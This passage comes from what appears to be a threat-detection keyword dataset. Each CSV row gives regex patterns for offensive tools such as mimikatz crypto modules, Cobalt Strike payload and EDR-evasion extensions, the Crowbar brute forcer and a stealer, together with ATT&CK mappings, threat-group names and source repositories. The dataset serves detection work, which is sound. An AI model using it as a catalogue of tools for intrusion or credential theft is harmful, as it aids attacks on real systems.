Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","39115"
"*CrossC2Script*",".{0,1000}CrossC2Script.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39116"
"*CrossLinked*",".{0,1000}CrossLinked.{0,1000}","offensive_tool_keyword","CrossLinked","CrossLinked simplifies the processes of searching LinkedIn to collect valid employee names when performing password spraying or other security testing against an organization. Using similar search engine scraping capabilities found in tools like subscraper and pymeta","T1596 - T1593 - T1591 - T1589 - T1556 - T1213","TA0043 - TA0010 - TA0009","N/A","N/A","Reconnaissance","https://github.com/m8r0wn/CrossLinked","1","0","N/A","N/A","N/A","10","1367","188","2024-11-26T12:52:16Z","2019-05-16T13:36:36Z","39117"
"*CrossNet.exe*",".{0,1000}CrossNet\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","N/A","10","10","362","58","2024-06-19T07:02:22Z","2021-02-08T10:52:39Z","39118"
"*Cross-Site-Scripting-XSS-Payloads*",".{0,1000}Cross\-Site\-Scripting\-XSS\-Payloads.{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0006 - TA0008 - TA0011 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","39119"
"*CrossTenantSynchronizationBackdoor.ps1*",".{0,1000}CrossTenantSynchronizationBackdoor\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","39120"
"*crowbar*",".{0,1000}crowbar.{0,1000}","offensive_tool_keyword","Crowbar","Crowbar (formally known as Levye) is a brute forcing tool that can be used during penetration tests. It was developed to brute force some protocols in a different manner according to other popular brute forcing tools. As an example. while most brute forcing tools use username and password for SSH brute force. Crowbar uses SSH key(s). This allows for any private keys that have been obtained during penetration tests. to be used to attack other SSH servers.","T1110 - T1114 - T1189 - T1051 - T1552","TA0002 - TA0006 - TA0008","N/A","Dispossessor","Credential Access","https://github.com/galkan/crowbar","1","0","N/A","N/A","N/A","10","1440","319","2023-12-19T20:57:36Z","2014-09-30T07:46:23Z","39121"
"*CroweCybersecurity/ad-ldap-enum*",".{0,1000}CroweCybersecurity\/ad\-ldap\-enum.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","AD Enumeration","6","4","308","66","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z","39123"
"*crpasswords.txt*",".{0,1000}crpasswords\.txt.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","39124"
"*CRTInjectAsSystem*",".{0,1000}CRTInjectAsSystem.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","39125"
"*CRTInjectElevated*",".{0,1000}CRTInjectElevated.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","39126"
"*CRTInjectWithoutPid*",".{0,1000}CRTInjectWithoutPid.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","39127"
"*crunch * -o *.txt*",".{0,1000}crunch\s.{0,1000}\s\-o\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","39128"
"*crunch 4 7 abcdefghijklmnopqrstuvwxyz1234567890 -o wordlist.txt*",".{0,1000}crunch\s4\s7\sabcdefghijklmnopqrstuvwxyz1234567890\s\-o\swordlist\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","39129"
"*crypt0p3g/bof-collection*",".{0,1000}crypt0p3g\/bof\-collection.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1555.003 - T1081 - T1056.004 - T1003","TA0006 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","N/A","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","39130"
"*crypto::capi*",".{0,1000}crypto\:\:capi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39131"
"*crypto::certificates*",".{0,1000}crypto\:\:certificates.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39132"
"*crypto::certtohw*",".{0,1000}crypto\:\:certtohw.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39133"
"*crypto::cng*",".{0,1000}crypto\:\:cng.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39134"
"*crypto::extract*",".{0,1000}crypto\:\:extract.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39135"
"*crypto::keys*",".{0,1000}crypto\:\:keys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39136"
"*crypto::providers*",".{0,1000}crypto\:\:providers.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39137"
"*crypto::sc*",".{0,1000}crypto\:\:sc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39138"
"*crypto::scauth*",".{0,1000}crypto\:\:scauth.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39139"
